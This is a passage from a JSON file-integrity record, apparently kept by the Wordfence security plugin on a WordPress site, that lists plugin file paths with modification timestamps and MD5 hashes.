\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_firewall_waf_options.php\":{\"d\":1544704184,\"h\":\"ddfc75d8cb6107c07e0608c876c0dd08\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/IPTrafList.php\":{\"d\":1544704184,\"h\":\"8fc89fdd803653352cd78c499d362f38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfScanEngine.php\":{\"d\":1544704184,\"h\":\"897feb7c7c33c00e6a2cb076c7570b03\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/IPTraf.php\":{\"d\":1544704184,\"h\":\"1e74c3c82c80f897ee7c34024cc4945e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfDirectoryIterator.php\":{\"d\":1544704184,\"h\":\"0a2b035a2f5f90ac1a78759de612760f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/compat.php\":{\"d\":1544704184,\"h\":\"3eeeb511e3f8ce7af07814948a438a7d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfNotification.php\":{\"d\":1544704184,\"h\":\"00c78d20560832e228c6c0fe64685644\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_dashboard_options.php\":{\"d\":1544704184,\"h\":\"6ac77e14c26913808d27e5bb5a3feeca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/flags.php\":{\"d\":1544704184,\"h\":\"15f61b69efcb63d2e7a3adb59263f02d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/dbview.php\":{\"d\":1544704184,\"h\":\"8fc68da4f1ddb53111ade88b996e7a6b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wordfenceHash.php\":{\"d\":1544704184,\"h\":\"a5d76d575735eff3922ee2a3d710e177\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_firewall.php\":{\"d\":1544704184,\"h\":\"37dd65e296366e68fca8a458dd9d77be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_firewall_blocking_options.php\":{\"d\":1544704184,\"h\":\"c5fe06ecfbbf68f6e33b42fe1592443a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/cronview.php\":{\"d\":1544704184,\"h\":\"da659828aeb8d474406e1b807212a4c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfCountryMap.php\":{\"d\":1544704184,\"h\":\"b1f10a9bf84533fcfb9dbaac8e12f184\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfUnlockMsg.php\":{\"d\":1544704184,\"h\":\"26c27cd7e3279d22e6eb8e35490e7395\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/.htaccess\":{\"d\":1544704184,\"h\":\"a34522784bcaea0e7bc738f6645312b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfCache.php\":{\"d\":1544704184,\"h\":\"283162a8cc22333af921e1ac606b74f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfBulkCountries.php\":{\"d\":1544704184,\"h\":\"61599e3105876463d214360df6a57eec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/sysinfo.php\":{\"d\":1544704184,\"h\":\"db8def51ea85b3f9c2f69d39d311ddfc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/email_unlockRequest.php\":{\"d\":1544704184,\"h\":\"1d18a796127bc93cfe1ef2ff3214df6d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_tools_diagnostic.php\":{\"d\":1544704184,\"h\":\"66223b3fab277e3741dcbeb98bf7f369\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfBrowscapCache.php\":{\"d\":1544704184,\"h\":\"115408c190ebcf51d7780f14876a8219\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_dashboard.php\":{\"d\":1544704184,\"h\":\"ce4fe7780b4791f3576c8aafc4efb43a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wordfenceConstants.php\":{\"d\":1544704184,\"h\":\"72abf7bda90c3706ad5d8561976e39cd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_firewall_blocking.php\":{\"d\":1544704184,\"h\":\"e95b3ffb1ebbe77f203fa2ac138797dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/email_genericAlert.php\":{\"d\":1544704184,\"h\":\"d53ae18058447dd0524ce543cd243743\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_tools_importExport.php\":{\"d\":1544704184,\"h\":\"245e6ba1eb1218ad3ecac65419b67ccc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfScan.php\":{\"d\":1544704184,\"h\":\"f0c2bbee8f8c94c381f056440698a6b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wordfenceScanner.php\":{\"d\":1544704184,\"h\":\"a228bd01e555b21d2b539874ed822833\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfCredentialsController.php\":{\"d\":1544704184,\"h\":\"029a60260fae8f9e76836a0deee98b50\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfHelperBin.php\":{\"d\":1544704184,\"h\":\"3befd72117b7c88dcbc93451d5de5823\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfView.php\":{\"d\":1544704184,\"h\":\"e287b22ab821fc50d3277cfa16251ad8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfSupportController.php\":{\"d\":1544704184,\"h\":\"f27c99103995371c3f7095493aa98138\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_tools_twoFactor.php\":{\"d\":1544704184,\"h\":\"f974e1391e42dee6b422b7c8dc6fb2a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfLog.php\":{\"d\":1544704184,\"h\":\"67ead81d4f37b22b0237aa1127b408a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/unknownFiles.php\":{\"d\":1544704184,\"h\":\"6ef6e813bde29c9a6f222a9c20a71262\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wordfenceClass.php\":{\"d\":1544704184,\"h\":\"5a65e92a61a3ff04bc4be3027b1998f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_support.php\":{\"d\":1544704184,\"h\":\"b07979308c274fc966818d78323bf544\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/email_newIssues.php\":{\"d\":1544704184,\"h\":\"ac8f735a819a86e157dc69d278b94040\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_tools.php\":{\"d\":1544704184,\"h\":\"6698fe2957865841bfd39fa8d1a7a094\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_firewall_waf.php\":{\"d\":1544704184,\"h\":\"6528232028ad7be9e7a7a13cb6bc2873\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfActivityReport.php\":{\"d\":1544704184,\"h\":\"9923fbc41eef18ed6a72aa32e1ec6d12\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfSchema.php\":{\"d\":1544704184,\"h\":\"bd68febd69fc4b3abf700157712e15a9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfPersistenceController.php\":{\"d\":1544704184,\"h\":\"f825ebe26b05798a9d9e1f69d54d4f2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/Diff.php\":{\"d\":1544704184,\"h\":\"527cd024b9c8ece7a9563b50e093e2d9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfIPWhitelist.php\":{\"d\":1544704184,\"h\":\"85999010dfd9d64881622794e90df739\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfConfig.php\":{\"d\":1544704184,\"h\":\"13b3628ac8c20a80a2dbc02d0276da7e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfDict.php\":{\"d\":1544704184,\"h\":\"79df204c07fceaef5a216245b1d46cda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_scanner.php\":{\"d\":1544704184,\"h\":\"8b006ba1f2a40cd46a42147851dfbbf8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/diffResult.php\":{\"d\":1544704184,\"h\":\"30e7f5b115150b83774a97c7d3116eb3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/iptraf.1543941426.css\":{\"d\":1544704184,\"h\":\"2b0913ce12e6eb1d3cbc647185375eb3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/wf-colorbox.1543941426.css\":{\"d\":1544704184,\"h\":\"08505829702183be4e38a66a0bad8c17\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/main.1543941426.css\":{\"d\":1544704184,\"h\":\"f99090cde89a91198c0d5b671b744e6b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/wf-roboto-font.1543941426.css\":{\"d\":1544704184,\"h\":\"b8c15dd5ef0c0bf0184f0f8c75ddb59c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/dt_table.1543941426.css\":{\"d\":1544704184,\"h\":\"06e5674a626a9c4ac18e39b96b3a03de\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/wf-font-awesome.1543941426.css\":{\"d\":1544704184,\"h\":\"b827c408ff4de4e7d98bf856b5aabf3a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/phpinfo.1543941426.css\":{\"d\":1544704184,\"h\":\"a33c60cc2c37917fdc4a06037500139f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/wf-onboarding.1543941426.css\":{\"d\":1544704184,\"h\":\"2ff2a54b7774cef647d707f3278528c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/jquery-ui.structure.min.1543941426.css\":{\"d\":1544704184,\"h\":\"23f52fcc08b1683cc01b9e55d5f514a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/jquery-ui.min.1543941426.css\":{\"d\":1544704184,\"h\":\"c07d4ff1935ed73074474716e4cc5113\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/jquery-ui-timepicker-addon.1543941426.css\":{\"d\":1544704184,\"h\":\"2965edf466d523a160509e7e37c4146e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/diff.1543941426.css\":{\"d\":1544704184,\"h\":\"49364f47cd6a4ca63fddf905769042ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/wf-adminbar.1543941426.css\":{\"d\":1544704184,\"h\":\"64614c5c3649a665e665d9120524d850\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/fullLog.1543941426.css\":{\"d\":1544704184,\"h\":\"2bb719ddf2f257896a0577cb847d9ae4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/wf-ionicons.1543941426.css\":{\"d\":1544704184,\"h\":\"416c14a1b0738fdcca6ac0e2af831b7f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/jquery-ui.theme.min.1543941426.css\":{\"d\":1544704184,\"h\":\"0462924bbf308e0f62f6ba78d199155d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/wfselect2.min.1543941426.css\":{\"d\":1544704184,\"h\":\"a4638a98cccf332c42f1141556c7c2e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/wordfenceBox.1543941426.css\":{\"d\":1544704184,\"h\":\"1b43bf90da5704599c7ee4489c23ec5d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/css\\/activity-report-widget.1543941426.css\":{\"d\":1544704184,\"h\":\"4a845e07783b7982ad82b0d463a1fdff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Exception\\/AuthenticationException.php\":{\"d\":1544704184,\"h\":\"a664ef571be82c82fa584545e66ff1fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Exception\\/OutOfQueriesException.php\":{\"d\":1544704184,\"h\":\"35f4fa482a66d2e424b0f0ca9d19d390\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Exception\\/InvalidRequestException.php\":{\"d\":1544704184,\"h\":\"4961bbe3eefdb5ff7f52c99e2578bcbf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Exception\\/GeoIp2Exception.php\":{\"d\":1544704184,\"h\":\"b14e09b853d258d93f7a0fd50e07b1d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Exception\\/AddressNotFoundException.php\":{\"d\":1544704184,\"h\":\"f7b42f2f1952b78482e1cc6ae3e9c92e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Exception\\/HttpException.php\":{\"d\":1544704184,\"h\":\"c86ccb666bb3ea3c19fdf7070d0ac0cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Record\\/Continent.php\":{\"d\":1544704184,\"h\":\"9971444c87dfde61aa5b093fe0af2406\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Record\\/Subdivision.php\":{\"d\":1544704184,\"h\":\"9b06d8ef3b75c289fd1c53b982ecb56c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Record\\/AbstractRecord.php\":{\"d\":1544704184,\"h\":\"24e06b4117ce60c06c77dcceecb87984\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Record\\/Location.php\":{\"d\":1544704184,\"h\":\"e110f1597d83898c603876e8fd85464a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Record\\/AbstractPlaceRecord.php\":{\"d\":1544704184,\"h\":\"0b60c4490c2e3a8f9b137fe2605052e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Record\\/Country.php\":{\"d\":1544704184,\"h\":\"fb94b8972c30c1a75a25c911ade6f99a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Record\\/Postal.php\":{\"d\":1544704184,\"h\":\"4dc2628d5022d1198a78d9594030f1e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Record\\/RepresentedCountry.php\":{\"d\":1544704184,\"h\":\"3e58561044e8fbb0af6dad7c5036190a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Record\\/Traits.php\":{\"d\":1544704184,\"h\":\"3b10486f16c4b4609ae9d7b36dc525f6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Record\\/City.php\":{\"d\":1544704184,\"h\":\"1c28af2c83a094beaf45da8ee6860e3b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Record\\/MaxMind.php\":{\"d\":1544704184,\"h\":\"a544719364369e2b22be90558f0687f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Model\\/Domain.php\":{\"d\":1544704184,\"h\":\"6e34a41e469abf304a43c6206eb2be6b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Model\\/Asn.php\":{\"d\":1544704184,\"h\":\"9cda840b9d0aba3110b768cdbe2102dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Model\\/ConnectionType.php\":{\"d\":1544704184,\"h\":\"649de5e0533abf2d4ec02151ddfb3022\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Model\\/Country.php\":{\"d\":1544704184,\"h\":\"00a651902332d08f1291b4f35280b495\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Model\\/City.php\":{\"d\":1544704184,\"h\":\"01ec038be43ed9ca59215c7a9bff4a58\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Model\\/Insights.php\":{\"d\":1544704184,\"h\":\"8c47c61b8cdf3da3be9d310a56e730ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Model\\/Enterprise.php\":{\"d\":1544704184,\"h\":\"84a185363a94f5f6be326b5033faaebc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Model\\/Isp.php\":{\"d\":1544704184,\"h\":\"ba941470d9bdadb850aadb5d478190db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Model\\/AnonymousIp.php\":{\"d\":1544704184,\"h\":\"65ba6d67ebdd9c7cf93cebbcb844680b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Model\\/AbstractModel.php\":{\"d\":1544704184,\"h\":\"401fd28f4889ff43a435cca85b00a5e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/WebService\\/Client.php\":{\"d\":1544704184,\"h\":\"2a0b10c8f382d66b93c5e410a8f9889e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/Database\\/Reader.php\":{\"d\":1544704184,\"h\":\"a6c50a1c416776fa983103500c83d8b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/src\\/ProviderInterface.php\":{\"d\":1544704184,\"h\":\"5abfcd7ff82a064e66c7d9bc7b849d15\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/.gitmodules\":{\"d\":1544704184,\"h\":\"a1da842003e271f63f73319ab5d4e555\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/LICENSE\":{\"d\":1544704184,\"h\":\"3b83ef96387f14655fc854ddc3c6bd57\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/geoip2\\/geoip2\\/.php_cs\":{\"d\":1544704184,\"h\":\"8b5f40e5650feee8e4330ca56294d942\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/composer\\/ca-bundle\\/res\\/cacert.pem\":{\"d\":1544704184,\"h\":\"2aeba46562a9b9117a9217520f67adc0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/composer\\/ca-bundle\\/src\\/CaBundle.php\":{\"d\":1544704184,\"h\":\"5a9a55f7af7e13bc4c35c2401a56550f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/composer\\/ca-bundle\\/LICENSE\":{\"d\":1544704184,\"h\":\"783e50a8f248e56536e25b4746d035af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/composer\\/autoload_static.php\":{\"d\":1544704184,\"h\":\"8842b95c8f1742482b9712b181df2909\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/composer\\/ClassLoader.php\":{\"d\":1544704184,\"h\":\"7bcd58ef2df6fe97165bea70fe9c7712\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/composer\\/LICENSE\":{\"d\":1544704184,\"h\":\"955d5fe58c231244f6b49000f383b5e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/composer\\/autoload_real.php\":{\"d\":1544704184,\"h\":\"2b183e722a9093b1149a11f708f46d49\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/composer\\/autoload_namespaces.php\":{\"d\":1544704184,\"h\":\"35e12c7d76c4a81633bcf547c0e229a9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/composer\\/installed.json\":{\"d\":1544704184,\"h\":\"6ce9b7e27c92da41e81536934619bf43\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/composer\\/autoload_psr4.php\":{\"d\":1544704184,\"h\":\"7f13da2a7194b6424974a7d39f413c22\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/composer\\/autoload_classmap.php\":{\"d\":1544704184,\"h\":\"8645d3a4e3ad87e7cf4d88a46717aab4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/lib\\/storage\\/file.php\":{\"d\":1544704184,\"h\":\"dd147f8c87ec1136ef484bff72b6c2d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/lib\\/parser\\/lexer.php\":{\"d\":1544704184,\"h\":\"e233488ace761de6509ea6e6c7a2161e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/lib\\/parser\\/parser.php\":{\"d\":1544704184,\"h\":\"acb1a48369f94434a14519b61cf0053f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/lib\\/parser\\/sqli.php\":{\"d\":1544704184,\"h\":\"faedda36eb92d9a4708fb8054f6c5e12\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/lib\\/utils.php\":{\"d\":1544704184,\"h\":\"db174f6f42e61a01370f3420fb7756f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/lib\\/view.php\":{\"d\":1544704184,\"h\":\"43bffdf5d88de9cc30d02b438f84b285\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/lib\\/rules.php\":{\"d\":1544704184,\"h\":\"929d632e8fa3fb5363be6ae6cb1faf24\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/lib\\/storage.php\":{\"d\":1544704184,\"h\":\"b67e82efa5159efafc1f34b93ed3a524\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/lib\\/xmlrpc.php\":{\"d\":1544704184,\"h\":\"10e3d56697adc20d4029f8abebbb9a14\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/lib\\/request.php\":{\"d\":1544704184,\"h\":\"dca1747dae9a7384ed774eef8e8dab1c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/lib\\/http.php\":{\"d\":1544704184,\"h\":\"f08c0dd2957ef01661e0cf4ac7452001\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfen